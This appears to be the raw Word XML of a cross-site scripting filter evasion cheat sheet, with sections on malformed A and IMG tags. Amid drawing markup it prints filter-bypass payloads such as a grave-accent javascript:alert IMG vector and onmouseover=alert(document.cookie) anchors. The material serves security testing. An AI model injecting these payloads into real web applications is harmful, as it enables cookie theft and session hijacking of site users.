                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 662 662"/>
                              <a:gd name="T27" fmla="*/ 662 h 414"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 662 662"/>
                              <a:gd name="T31" fmla="*/ 662 h 414"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 683 662"/>
                              <a:gd name="T35" fmla="*/ 683 h 414"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1054 662"/>
                              <a:gd name="T39" fmla="*/ 1054 h 414"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1075 662"/>
                              <a:gd name="T43" fmla="*/ 1075 h 414"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1075 662"/>
                              <a:gd name="T47" fmla="*/ 1075 h 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414">
                                <a:moveTo>
                                  <a:pt x="8679" y="413"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="389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392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 1391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662"/>
                            <a:ext cx="8700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0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SRC=`javascript:alert("RSnake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0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says,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'XSS'")`&gt;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90" o:spid="_x0000_s1047" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:33.1pt;width:435pt;height:20.7pt;z-index:-15724544;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,662" coordsize="8700,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">
                <v:shape id="Freeform 1392" o:spid="_x0000_s1048" style="position:absolute;left:1614;top:662;width:8700;height:414;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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NL4MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBDF74LfYRnBm9nUf9XUVaRg0aNR6HXITpPQ&#10;7GzIbk389p1DobcZ3pv3frM7DK5RD+pC7dnAS5KCIi68rbk0cL+dZhtQISJbbDyTgScFOOzHox1m&#10;1vd8pUceSyUhHDI0UMXYZlqHoiKHIfEtsWhfvnMYZe1KbTvsJdw1ep6ma+2wZmmosKX3iorv/McZ&#10;WOb0urms8vr88Tk8t4tlH9rQGzOdDMc3UJGG+G/+uz5bwV9shV++kRH0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DS+DEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,413l21,413r-3,l,392r,-3l,21,21,,8679,r21,21l8700,392r-18,21l8679,413xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1075;21,1075;18,1075;0,1054;0,1051;0,683;21,662;8679,662;8700,683;8700,1054;8682,1075;8679,1075" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1391" o:spid="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:1614;top:662;width:8700;height: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sw2MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6sYKUqMbEWmhIBRjevA4ZifJ&#10;YnY2zW41/vuuUOhtHu9z1pvBtuJKvTeOFcymCQji0mnDtYKv4v35FYQPyBpbx6TgTh422ehpjal2&#10;N87pegy1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zFcNvKlyRZSIuGY0ODHe0aKi/HH6tg&#10;e+L8zXx/ng95lZuiWCa8X1yUmoyH7QpEoCH8i//cHzrOny9n8Pgmn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7MNjEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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40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SRC=`javascript:alert("RSnake</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="40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says,</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="41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'XSS'")`&gt;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If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need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both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>double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single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes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grave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>accent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encapsulate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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lots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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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grave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>accents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="124"/>
      </w:pPr>
      <w:r>
        <w:t>Malformed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Tags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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Skip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HREF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attribute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meat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XXS...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Submitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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David</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>\~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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3040380" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1386" name="Group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0380" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="4788" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1387" name="Freeform 1389"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="4788" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6380 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4788"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4788"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4788"/>
                              <a:gd name="T10" fmla="+- 0 421 240"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4788"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4788"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4788"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4788"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6380 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4788"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6401 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4788"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6401 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4788"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6384 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4788"/>
                              <a:gd name="T42" fmla="+- 0 421 240"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6380 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4788"/>
                              <a:gd name="T46" fmla="+- 0 422 240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88" h="183">
                                <a:moveTo>
                                  <a:pt x="476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766" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4770" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="476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" name="Text Box 1388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39"/>
                            <a:ext cx="478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\&lt;a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onmouseover="alert(document.cookie)"\&gt;xxs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link\&lt;/a\&gt;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87" o:spid="_x0000_s1050" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:239.4pt;height:9.15pt;z-index:-15724032;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="4788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">
                <v:shape id="Freeform 1389" o:spid="_x0000_s1051" style="position:absolute;left:1614;top:239;width:4788;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="478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69TMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22oCMRB9L/QfwhT6IpptBSurUUprwRsFLwi+DZvp&#10;7tJksiSprn9vBKFvczjXGU9ba8SJfKgdK3jpZSCIC6drLhXsd1/dIYgQkTUax6TgQgGmk8eHMeba&#10;nXlDp20sRQrhkKOCKsYmlzIUFVkMPdcQJ+7HeYsxQV9K7fGcwq2Rr1k2kBZrTg0VNvRRUfG7/bMK&#10;Vo1fHI6fjN9meejYsJ4ZG2ZKPT+17yMQkdr4L7675zrN7w/f4PZNOkFO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evUzEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4766,182l21,182r-3,-1l,161r,-3l,21,21,,4766,r21,21l4787,161r-17,20l4766,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4766,422;21,422;18,421;0,401;0,398;0,261;21,240;4766,240;4787,261;4787,401;4770,421;4766,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1388" o:spid="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:4788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gPmMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3urGFsRGV5HSQkEQY3rocZod&#10;k8XsbJrdavz3zkHwNsN78943i9XgW3WiPrrABibjDBRxFazj2sB3+fk8AxUTssU2MBm4UITV8vFh&#10;gbkNZy7otE+1khCOORpoUupyrWPVkMc4Dh2xaIfQe0yy9rW2PZ4l3Lf6Jcum2qNjaWiwo/eGquP+&#10;3xtY/3Dx4f62v7viULiyfMt4Mz0aM3oa1nNQiYZ0N9+uv6zgv84EV76REf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gPmM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\&lt;a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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onmouseover="alert(document.cookie)"\&gt;xxs</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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link\&lt;/a\&gt;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GvdeMetni"/>
        <w:spacing w:before="101" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>loves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replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes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you...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ever</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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stuck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>just</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>leave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>off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Chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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place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fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes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script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11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113030</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2940050" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1383" name="Group 1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050" cy="116205"/>
                          <a:chOff x="1614" y="178"/>
                          <a:chExt cx="4630" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1384" name="Freeform 1386"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="177"/>
                            <a:ext cx="4630" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6222 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4630"/>
                              <a:gd name="T2" fmla="+- 0 360 178"/>
                              <a:gd name="T3" fmla="*/ 360 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4630"/>
                              <a:gd name="T6" fmla="+- 0 360 178"/>
                              <a:gd name="T7" fmla="*/ 360 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4630"/>
                              <a:gd name="T10" fmla="+- 0 359 178"/>
                              <a:gd name="T11" fmla="*/ 359 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4630"/>
                              <a:gd name="T14" fmla="+- 0 339 178"/>
                              <a:gd name="T15" fmla="*/ 339 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4630"/>
                              <a:gd name="T18" fmla="+- 0 336 178"/>
                              <a:gd name="T19" fmla="*/ 336 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4630"/>
                              <a:gd name="T22" fmla="+- 0 199 178"/>
                              <a:gd name="T23" fmla="*/ 199 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4630"/>
                              <a:gd name="T26" fmla="+- 0 178 178"/>
                              <a:gd name="T27" fmla="*/ 178 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6222 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4630"/>
                              <a:gd name="T30" fmla="+- 0 178 178"/>
                              <a:gd name="T31" fmla="*/ 178 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6244 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4630"/>
                              <a:gd name="T34" fmla="+- 0 199 178"/>
                              <a:gd name="T35" fmla="*/ 199 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6244 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4630"/>
                              <a:gd name="T38" fmla="+- 0 339 178"/>
                              <a:gd name="T39" fmla="*/ 339 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6226 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4630"/>
                              <a:gd name="T42" fmla="+- 0 359 178"/>
                              <a:gd name="T43" fmla="*/ 359 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6222 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4630"/>
                              <a:gd name="T46" fmla="+- 0 360 178"/>
                              <a:gd name="T47" fmla="*/ 36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630" h="183">
                                <a:moveTo>
                                  <a:pt x="460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608" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4630" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4630" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4612" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="460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Text Box 1385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77"/>
                            <a:ext cx="463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\&lt;a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onmouseover=alert(document.cookie)\&gt;xxs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link\&lt;/a\&gt;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84" o:spid="_x0000_s1053" style="position:absolute;margin-left:80.7pt;margin-top:8.9pt;width:231.5pt;height:9.15pt;z-index:-15723520;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,178" coordsize="463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">
                <v:shape id="Freeform 1386" o:spid="_x0000_s1054" style="position:absolute;left:1614;top:177;width:4630;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="463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jZIsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMEIvUrO2WmQ1itoKVU+1HjwOm3Gz&#10;uJksm+hu/70pCN7m8T5ntmhtKW5U+8KxguEgAUGcOV1wruD4u3mdgPABWWPpmBT8kYfFvNuZYapd&#10;wz90O4RcxBD2KSowIVSplD4zZNEPXEUcubOrLYYI61zqGpsYbkv5liQf0mLBscFgRWtD2eVwtQou&#10;q8/x1pZkcPy1bwLu6NTPrkq99NrlFESgNjzFD/e3jvPfJyP4/yae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jZIsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m4608,182l21,182r-3,-1l,161r,-3l,21,21,,4608,r22,21l4630,161r-18,20l4608,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4608,360;21,360;18,359;0,339;0,336;0,199;21,178;4608,178;4630,199;4630,339;4612,359;4608,360" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1385" o:spid="_x0000_s1055" type="#_x0000_t202" style="position:absolute;left:1614;top:177;width:463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mgBsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxR6000rik3diBSFQqEY00OP0+yY&#10;LMnOxuxW47/vCoK3ebzPWa4G24oT9d44VvA8SUAQl04brhR8F9vxAoQPyBpbx6TgQh5W2cNoial2&#10;Z87ptA+ViCHsU1RQh9ClUvqyJot+4jriyB1cbzFE2FdS93iO4baVL0kylxYNx4YaO3qvqWz2f1bB&#10;+ofzjTl+/e7yQ26K4jXhz3mj1NPjsH4DEWgId/HN/aHj/OliBtdv4gk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ZoAb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\&lt;a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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onmouseover=alert(document.cookie)\&gt;xxs</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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link\&lt;/a\&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Malformed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="130"/>
      </w:pPr>
      <w:r>
        <w:t>Originally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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Begeek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cleaned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up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shortened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work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browsers),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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses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relaxed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine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our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>within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IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag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should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encapsulated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes.</w:t>
